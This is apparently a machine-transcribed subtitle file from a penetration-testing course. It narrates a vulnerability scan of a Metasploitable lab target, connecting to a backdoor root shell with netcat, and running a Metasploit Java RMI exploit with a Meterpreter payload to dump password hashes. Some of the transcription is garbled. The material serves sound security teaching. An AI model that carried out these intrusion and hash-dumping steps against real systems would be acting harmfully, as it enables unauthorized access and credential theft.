1 00:00:00,360 --> 00:00:02,730 ‫So the scan is completed in 17 minutes. 2 00:00:03,390 --> 00:00:06,720 ‫Now, another pause here because I disabled the Windows plug ins. 3 00:00:06,960 --> 00:00:10,620 ‫It seems as if the Windows systems don't have critical vulnerabilities. 4 00:00:10,980 --> 00:00:15,930 ‫It's not right, especially my Windows XP has several critical vulnerabilities. 5 00:00:16,530 --> 00:00:21,900 ‫If you didn't disable Windows plug ins, you're supposed to see some more vulnerabilities for Windows 6 00:00:21,900 --> 00:00:22,410 ‫systems. 7 00:00:23,720 --> 00:00:27,050 ‫Now, to see the results of the Metasploit will scan in detail. 8 00:00:27,500 --> 00:00:30,650 ‫Let's click the US voidable results two zero six. 9 00:00:32,050 --> 00:00:40,180 ‫The home found 10 critical vulnerabilities with her skin configuration, but please note that the configuration 10 00:00:40,210 --> 00:00:45,970 ‫affects the results, so the target systems may have more vulnerabilities than reported. 11 00:00:47,770 --> 00:00:54,040 ‫If there is a vulnerability and it's not found in the scan, we call it a false negative. 12 00:00:55,290 --> 00:01:01,370 ‫I'm sure you know that the critical vulnerabilities are the most dangerous ones, but that's where it 13 00:01:01,370 --> 00:01:02,010 ‫gets good. 14 00:01:02,030 --> 00:01:04,400 ‫They are the most exploitable ones in general. 15 00:01:05,180 --> 00:01:11,210 ‫So let's click on one of these critical vulnerabilities, for example, being shown back door detection. 16 00:01:12,640 --> 00:01:18,250 ‫Well, look at the description, it says a shell is listening on the port without any authentication 17 00:01:18,250 --> 00:01:19,060 ‫being required. 18 00:01:19,750 --> 00:01:21,880 ‫This is obviously a back door. 19 00:01:23,050 --> 00:01:25,090 ‫Here's a port number of 15 24. 20 00:01:25,540 --> 00:01:31,240 ‫Now let's check of the finding is a true positive go to terminal screen. 21 00:01:31,870 --> 00:01:33,970 ‫I use net cat tool to connect. 22 00:01:34,330 --> 00:01:36,130 ‫Simply type and see. 23 00:01:36,130 --> 00:01:40,990 ‫And the target IP and the target port 15 24 and we're in. 24 00:01:42,400 --> 00:01:44,230 ‫We have the shell for Metis voidable. 25 00:01:45,640 --> 00:01:50,950 ‫Type, who am I to learn the credential we have, we are the user. 26 00:01:51,490 --> 00:01:53,520 ‫Now it was too simple. 27 00:01:53,530 --> 00:01:56,590 ‫It's just not fun and you know, I don't like it. 28 00:01:56,590 --> 00:01:57,940 ‫I like a good challenge, right? 29 00:01:58,360 --> 00:02:02,980 ‫I mean, we are the root user and we can access anything we want. 30 00:02:02,980 --> 00:02:07,360 ‫For example, Shadow File, which contains the hashes of the user's passwords. 31 00:02:14,570 --> 00:02:21,800 ‫OK, back to the browser and click on the Back to Vulnerabilities link to turn back to the vulnerabilities 32 00:02:21,800 --> 00:02:22,430 ‫of Metasploit. 33 00:02:23,750 --> 00:02:25,370 ‫Now I'd like to show you some more. 34 00:02:26,720 --> 00:02:27,770 ‫Scroll on down. 35 00:02:28,010 --> 00:02:34,790 ‫The vulnerability, it shows 50 vulnerabilities per page by default, but let's make it 200 to see all 36 00:02:34,790 --> 00:02:36,320 ‫the findings in a single page. 37 00:02:37,980 --> 00:02:40,650 ‫Now, the findings are ordered by severity levels. 38 00:02:41,010 --> 00:02:43,320 ‫So information is at the bottom. 39 00:02:44,290 --> 00:02:50,560 ‫Findings with a severity level of information identify non vulnerability information, which is, you 40 00:02:50,560 --> 00:02:55,270 ‫know, nice to know, and it keeps it separate from the vulnerability detail. 41 00:02:57,100 --> 00:03:00,790 ‫So here there's an info army registry detection. 42 00:03:01,420 --> 00:03:01,990 ‫Let's click it. 43 00:03:02,910 --> 00:03:08,670 ‫It says that the remote host is running an army registry, retrieving remote objects in the Java runtime 44 00:03:08,670 --> 00:03:10,290 ‫method invocation system. 45 00:03:11,370 --> 00:03:14,260 ‫So let's look for the exploits of the Metasploit Framework. 46 00:03:14,280 --> 00:03:17,250 ‫If there is any exploit for Java Army. 47 00:03:38,740 --> 00:03:42,160 ‫Opening terminal screen and run MSF console. 48 00:03:50,020 --> 00:03:55,180 ‫So here we have MSF console, let's search the exploits of our Am I. 49 00:04:09,150 --> 00:04:10,170 ‫Too many results. 50 00:04:11,750 --> 00:04:13,070 ‫To keep it more specific. 51 00:04:13,340 --> 00:04:15,650 ‫I want to search Java or am I? 52 00:04:22,340 --> 00:04:26,060 ‫So we have two auxiliaries and two exploits at this time. 53 00:04:26,810 --> 00:04:29,520 ‫So look at the exploit in the last line. 54 00:04:30,200 --> 00:04:37,100 ‫This module takes advantage of the default configuration of the Army Registry and Army Activation Services, 55 00:04:37,520 --> 00:04:40,630 ‫which allow loading classes from any remote URL. 56 00:04:41,860 --> 00:04:44,020 ‫Let's try to use it on our army report. 57 00:04:45,310 --> 00:04:49,570 ‫Please don't worry, I am going to explain what these all mean. 58 00:04:49,780 --> 00:04:53,020 ‫I just want to show you an example at the beginning. 59 00:04:53,440 --> 00:04:57,700 ‫So bear with me type, use the module name with the full path. 60 00:04:58,600 --> 00:05:04,060 ‫You can simply select the module name and click the middle button of the mouse to copy and paste it. 61 00:05:05,370 --> 00:05:10,440 ‫Type show payloads to see the payloads can be used with this module. 62 00:05:12,100 --> 00:05:15,070 ‫So I want to use this payload to have a Net-A-Porter session. 63 00:05:15,100 --> 00:05:18,190 ‫Again, don't worry, I'll explain what the interpreter is soon. 64 00:05:18,470 --> 00:05:24,850 ‫But just copy and paste the payload name type, show options to see the parameters of the exploit and 65 00:05:24,850 --> 00:05:25,900 ‫the payload as well. 66 00:05:27,040 --> 00:05:34,630 ‫Set the remote host as Metasploit able to zero six default remote port is the same with our port one 67 00:05:34,630 --> 00:05:35,530 ‫zero nine nine. 68 00:05:36,580 --> 00:05:44,500 ‫Serve Host is a local host to listen on set this to be our collie to to to. 69 00:05:45,530 --> 00:05:47,390 ‫But the Vault Surf Port Remain. 70 00:05:49,180 --> 00:05:51,280 ‫So the other options are not required. 71 00:05:51,310 --> 00:05:52,420 ‫I'll just leave it blank. 72 00:05:53,850 --> 00:05:59,340 ‫Now are the payload options set the listen host to be our colleague? 73 00:05:59,340 --> 00:06:07,560 ‫01:58 Default Listen Port is good for four, four four and finally type exploit to run the exploit. 74 00:06:15,090 --> 00:06:18,180 ‫So there it looks like we have a maturity session. 75 00:06:19,220 --> 00:06:22,610 ‫Type sessions dash l to list the active sessions. 76 00:06:23,030 --> 00:06:23,540 ‫Be patient. 77 00:06:23,570 --> 00:06:30,470 ‫We'll see them in detail type session Dash II Session ID to interact with the session. 78 00:06:31,220 --> 00:06:32,600 ‫And here we are. 79 00:06:32,600 --> 00:06:34,070 ‫We're in now. 80 00:06:34,070 --> 00:06:35,810 ‫I'm going to show you what we can do with him. 81 00:06:35,810 --> 00:06:38,360 ‫Interpreter session in the following chapter. 82 00:06:38,690 --> 00:06:41,540 ‫But here's a couple of Metro operator commands. 83 00:06:42,230 --> 00:06:44,150 ‫This info to see the system information. 84 00:06:48,050 --> 00:06:50,630 ‫Hash dump to gather password hashes. 85 00:06:51,590 --> 00:06:58,520 ‫Now, no such command for this system, thankfully, we have an alternative for this type run post slash, 86 00:06:58,520 --> 00:07:05,030 ‫Linux slash, gather slash, hash dump and hit enter and collect the fruits of your labor. 87 00:07:06,240 --> 00:07:12,870 ‫So as you see here, we found another way to exploit the system, even though the finding was just information. 88 00:07:13,740 --> 00:07:17,430 ‫So I hope you understand not to underestimate any finding.